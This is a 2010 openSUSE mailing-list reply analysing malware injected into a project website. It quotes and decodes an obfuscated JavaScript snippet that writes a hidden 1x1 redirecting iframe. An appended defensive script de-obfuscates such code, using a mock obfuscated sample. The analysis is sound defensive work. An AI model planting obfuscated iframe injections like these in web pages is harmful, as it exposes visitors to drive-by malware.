Mailinglist Archive: opensuse-project (465 mails)

Re: [opensuse-project] is a bad website
  • From: David Haller <dnh@xxxxxxxxxxxx>
  • Date: Fri, 2 Jul 2010 01:06:06 +0200
  • Message-id: <20100701230606.GA7231@xxxxxxxxxxxxxxxxxx>

On Thu, 01 Jul 2010, Marcus Meissner wrote:
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio <andrea@xxxxxxxxxxxx>:

According to firefox/google, is a bad website...
anything we can do??

The FAQ explains how it works:

But it's my understanding that it has already been reported:


The very first line looks truly like malware:

script language=JavaScript document.write(unescape('%3c'+'%73cri%70t
%62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640

So it seems at a deeper look.

$ jsshell
js> unescape('%3c'+'%73cri%70t
%62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640
he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0
js> unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0
<iframe width=1 height=1 border=0 frameborder=0

So, it "injects" an "invisible" 1x1 iframe. The weird stuff is: redirects to, if you
call it as a linux browser.

But if you call it as e.g. an ie6, you get redirected to

So, I guess depending on which browser you use (and whatever else) you
could get redirected to a site where malware is, trying to be
installed as drive-by-download or whatever.

Anyway, JavaScript unescape orgies are always a bad sign. Please, tell
the admins to reinstall from a clean source / backups. And webpin's
index has been broken for quite a while anyway.


PS: jsshell is part of libjs, no idea if oS/packman package it.

[Stefan Wegmann is looking for a visually appealing CD-burning program] Hmmmm,
I had not looked at the whole thing from that angle at all. What would suit
your refined aesthetic demands? A delicate chartreuse in slightly fluffy
contrast to a springlike Easter-egg-yolk yellow? With buttons in a floral
design and chiffon-esque help windows with an airy, translucent look?
[Thomas Templin in suse-linux]
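
The two-step decode done in the jsshell session above can also be carried out without evaluating the script at all. Added example, not part of the original mail: it folds the '...'+'...' fragments, percent-decodes until the text stops changing, and reports 1x1 iframes. The sample string, its sample.invalid URL and all function names are constructed for illustration.

```javascript
// Added example: static de-obfuscation; the script text is never evaluated.
const MAX_ROUNDS = 5; // assumption: deeper nesting than this is reported as-is

// Constructed sample in the style of the snippet quoted in the mail.
const SAMPLE =
  "document.write(unescape('%3c'+'%73cri%70t%3edocument.write(unescape(" +
  "%27%253ciframe w%27+%27i%2564th=1 he%25'+'69ght=1 frameborder=0 " +
  "src=http://sample.invalid/x%253e%253c/iframe%253e%27))%3c/script%3e'));";

// Merge 'a'+'b' concatenations so escapes split across literals rejoin.
function foldConcat(text) {
  return text.replace(/'\s*\+\s*'/g, "");
}

// One pass of what unescape() does: %uXXXX and %XX, nothing else.
function percentDecode(text) {
  return text.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Peel encoding layers until the text is stable; returns every stage.
function peel(text) {
  const layers = [text];
  for (let i = 0; i < MAX_ROUNDS; i++) {
    const prev = layers[layers.length - 1];
    const next = percentDecode(foldConcat(prev));
    if (next === prev) break;
    layers.push(next);
  }
  return layers;
}

// Report iframe tags whose width and height are both 0 or 1.
function hiddenIframes(html) {
  const hits = [];
  for (const [tag] of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const num = (name) => {
      const m = tag.match(new RegExp("\\b" + name + "\\s*=\\s*[\"']?(\\d+)", "i"));
      return m ? Number(m[1]) : null;
    };
    const w = num("width"), h = num("height");
    if (w === null || h === null || w > 1 || h > 1) continue;
    const src = tag.match(/\bsrc\s*=\s*["']?([^\s"'>]+)/i);
    hits.push({ tag, src: src ? src[1] : null });
  }
  return hits;
}

const layers = peel(SAMPLE);
console.log(layers.length - 1, "layers;", hiddenIframes(layers[layers.length - 1]));
```

Scanning the undecoded text finds nothing, which is why a filter that only looks at the page as served misses this kind of injection.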